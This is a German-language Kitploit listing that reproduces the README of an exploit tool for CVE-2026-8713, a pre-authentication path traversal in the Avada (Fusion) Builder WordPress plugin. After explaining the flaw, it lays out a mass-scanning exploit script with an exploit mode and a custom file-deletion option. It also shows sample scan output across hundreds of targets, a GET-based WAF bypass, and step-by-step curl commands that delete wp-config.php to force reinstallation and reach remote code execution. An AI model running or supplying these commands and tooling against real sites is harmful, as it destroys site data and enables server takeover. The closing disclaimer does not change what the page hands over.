Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-8713 — Pre-Auth-Pfad-Traversierung zu willkürlichem Dateilöschen in Avada (Fusion) Builder <= 3.15.3, die zu RCE führt (CVSS 9.1) | Kitploit
Tools/GitHubGitHub/shinthink/cve-2026-8713
SchwachstellenscannerSchwachstellenanalyseExploitationWebanwendungs-ExploitationWAF-UmgehungWebsicherheitPenetrationstestsLernen & Bildung
GitHubshinthink/cve-2026-8713

CVE-2026-8713

Pre-Auth-Pfad-Traversierung zu willkürlichem Dateilöschen in Avada (Fusion) Builder <= 3.15.3, die zu RCE führt (CVSS 9.1)

Repository anzeigen
4vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-8713 — Avada (Fusion) Builder WordPress-Exploit

Pre-Auth Path Traversal → Löschen beliebiger Dateien → Neuinstallation erzwingen → RCE


Übersicht

CVE-2026-8713 ist eine kritische Schwachstelle mit CVSS 9.1 im Plugin/Theme Avada (Fusion) Builder für WordPress. Die Funktion maybe_delete_files() in der Klasse Fusion_Form_DB_Entries konstruiert Dateisystempfade aus angreiferkontrollierten Formulareingabewerten mittels einfacher Zeichenkettenersetzung – ohne realpath()-Validierung oder Verzeichnisbegrenzungsprüfungen.

Ein nicht authentifizierter Angreifer sendet ein Path-Traversal-Payload über den fusion_form_submit_ajax Handler. Wenn der Fusion_Form_DB_Privacy-Shutdown-Hook den Eintrag mit privacy_expiration_action=delete verarbeitet, wird die gezielte Datei vom Server entfernt.

Betroffene Versionen

VersionStatus
Fusion Builder ≤ 3.15.3Verwundbar
Fusion Builder ≥ 3.15.4Behoben
Avada Theme (alle)Gebündeltes Plugin ggf. verwundbar

Hinweis: Die Avada-Theme-Version (7.x) unterscheidet sich von der Fusion-Builder-Plugin-Version (3.x). Die Schwachstelle liegt im Plugin, der Scanner erkennt jedoch beide.


Schwachstellenmechanismus

Ursache

In fusion-builder/inc/class-fusion-form-db-entries.php löst die Methode maybe_delete_files() Dateipfade mittels Zeichenkettenersetzung ohne Begrenzungsvalidierung auf:

root@kitploit:~
$file_path = str_replace($upload['url'], $upload['path'], $value);
// No realpath() check — path traversal sequences pass through
unlink($file_path);

Angriffskette

root@kitploit:~
1. Angreifer sendet Avada-Formular über wp_ajax_nopriv_fusion_form_submit_ajax
   → Path Traversal: ../../wp-config.php
   → privacy_expiration_action = delete
   → privacy_expiration_interval = 0

2. WordPress-Shutdown-Hook löst Fusion_Form_DB_Privacy aus
   → Verarbeitet gespeicherten Formulareintrag
   → Ruft maybe_delete_files() mit angreiferkontrolliertem Pfad auf
   → wp-config.php wird gelöscht

3. WordPress wechselt in den Setup-/Installationsmodus
   → Angreifer verbindet die Website mit einer schädlichen Datenbank
   → Vollständige Remote-Codeausführung

Nicht authentifizierter Zugriff

Der AJAX-Handler ist mit wp_ajax_nopriv_ registriert, wodurch er für nicht authentifizierte Benutzer zugänglich ist:

root@kitploit:~
POST /wp-admin/admin-ajax.php
  action=fusion_form_submit_ajax
  form_id=<id>
  privacy_expiration_action=delete
  fusion_privacy_expiration_interval=0
  fusion_form_field_<name>=../../wp-config.php

WAF-Umgehung

Viele Hosts blockieren POST an /wp-admin/admin-ajax.php. WordPress akzeptiert Parameter per GET an diesem Endpunkt, was eine triviale Umgehung ermöglicht:

root@kitploit:~
GET /wp-admin/admin-ajax.php?action=fusion_form_submit_ajax&form_id=<id>&privacy_expiration_action=delete&...

Installation

root@kitploit:~
git clone https://github.com/shinthink/CVE-2026-8713.git
cd CVE-2026-8713
pip install -r requirements.txt

Verwendung

root@kitploit:~
# Nur Erkennung (Standard – keine Dateilöschung)
python cve_2026_8713.py -t target.com

# Massenerkennung
python cve_2026_8713.py -f targets.txt

# Exploit-Modus – wp-config.php löschen
python cve_2026_8713.py -t target.com --exploit

# Benutzerdefinierte Datei löschen
python cve_2026_8713.py -t target.com --exploit --delete "../../../debug.log"

Argumente

root@kitploit:~
  -t, --target      Einzelnes Ziel (Domain oder IP)
  -f, --file        Zielliste, eine pro Zeile
  --exploit         Dateilöschung aktivieren (Standard: nur Erkennung)
  --delete PFAD     Benutzerdefinierter zu löschender Dateipfad (Standard: wp-config.php)
  -o, --output      Ergebnisse in Datei speichern
  --threads         Arbeiter (Standard: 20)
  -v, --verbose     Detaillierte Ausgabe anzeigen

Proof of Concept

Erkennungsmodus

root@kitploit:~
$ python cve_2026_8713.py -f targets.txt
root@kitploit:~
  CVE-2026-8713  Avada (Fusion) Builder  |  CVSS 9.1
  Modus: Erkennung  |  Ziele: 521  |  Arbeiter: 20
  ───────────────────────────────────────────────────────

  [EXPLOIT]  target-vuln.com      1.2s  Formular #3  (AJAX offen)
  [VULN]     target-waf.com       2.1s  Formular #1  (WAF blockiert)
  [AVADA]    target-noform.com    0.5s  (kein Formular gefunden)
  [-]        target-noavada.com   0.3s

  ───────────────────────────────────────────────────────
  Scan abgeschlossen  |  Zeit: 45s
  ───────────────────────────────────────────────────────
  Ziele        : 521
  Avada erkannt : 47
  Formulare gefunden : 12
  Verwundbar     : 9

Exploit-Modus

root@kitploit:~
$ python cve_2026_8713.py -t target.com --exploit -v
root@kitploit:~
  CVE-2026-8713 — Avada Builder Exploit
  CVSS 9.1 | Pre-Auth | Path Traversal → Dateilöschung → RCE

    [+] Avada-Formular gefunden: id=3
    [+] POST form_id=3: HTTP 403 (WAF blockiert)
    [+] GET form_id=3: HTTP 200 (WAF umgangen)

  Host     : target.com
  Avada    : JA
  Formular : 3
  Gelöscht : wp-config.php (Neuinstallation erzwungen → RCE)
  Zeit     : 3.2s

Manuelle Ausnutzung

Schritt 1 — Avada überprüfen

root@kitploit:~
curl -sk 'https://target.com/wp-content/themes/Avada/style.css' | head -5

Schritt 2 — Formular-ID finden

root@kitploit:~
curl -sk 'https://target.com/' | grep -oP 'fusion-form[^"]*form-id=["\x27](https://github.com/shinthink/cve-2026-8713/blob/HEAD/%5Cd+)'

Schritt 3 — Formular mit Path Traversal senden

root@kitploit:~
curl -sk -X POST \
  -d 'action=fusion_form_submit_ajax' \
  -d 'form_id=3' \
  -d 'privacy_expiration_action=delete' \
  -d 'fusion_privacy_expiration_interval=0' \
  -d 'fusion_form_field_x=../../wp-config.php' \
  'https://target.com/wp-admin/admin-ajax.php'

Schritt 4 — WAF-Umgehung (falls POST blockiert)

root@kitploit:~
curl -sk 'https://target.com/wp-admin/admin-ajax.php?action=fusion_form_submit_ajax&form_id=3&privacy_expiration_action=delete&fusion_privacy_expiration_interval=0&fusion_form_field_x=../../wp-config.php'

Schritt 5 — RCE überprüfen und ausnutzen

root@kitploit:~
# Site in install mode?
curl -sk -o /dev/null -w '%{http_code}' 'https://target.com/wp-admin/install.php'
# HTTP 200 → wp-config gelöscht → Verbindung mit schädlicher DB → vollständige RCE

Haftungsausschluss

NUR ZU BILDUNGSZWECKEN UND AUTORISIERTEN TESTS.

Diese Software richtet sich an Sicherheitsexperten, die autorisierte Penetrationstests durchführen, Organisationen, die ihre eigene Infrastruktur prüfen, und Forscher, die die Ausnutzung von Schwachstellen untersuchen.

Unbefugter Zugriff auf Computersysteme ist illegal und kann gegen folgende Gesetze verstoßen:

  • Vereinigte Staaten: Computer Fraud and Abuse Act (18 U.S.C. 1030)
  • Indonesien: UU ITE Pasal 30 & 46
  • Europäische Union: Directive 2013/40/EU
  • Vereinigtes Königreich: Computer Misuse Act 1990

Die Autoren übernehmen keine Haftung für Missbrauch.


Referenzen


Dieses Projekt ist nicht mit ThemeFusion oder Avada verbunden.

Tool herunterladen
RessourceLink
IONIX Advisoryionix.io/threat-center/cve-2026-8713
Wordfence Advisorywordfence.com
Patchstackpatchstack.com
NVD EntryCVE-2026-8713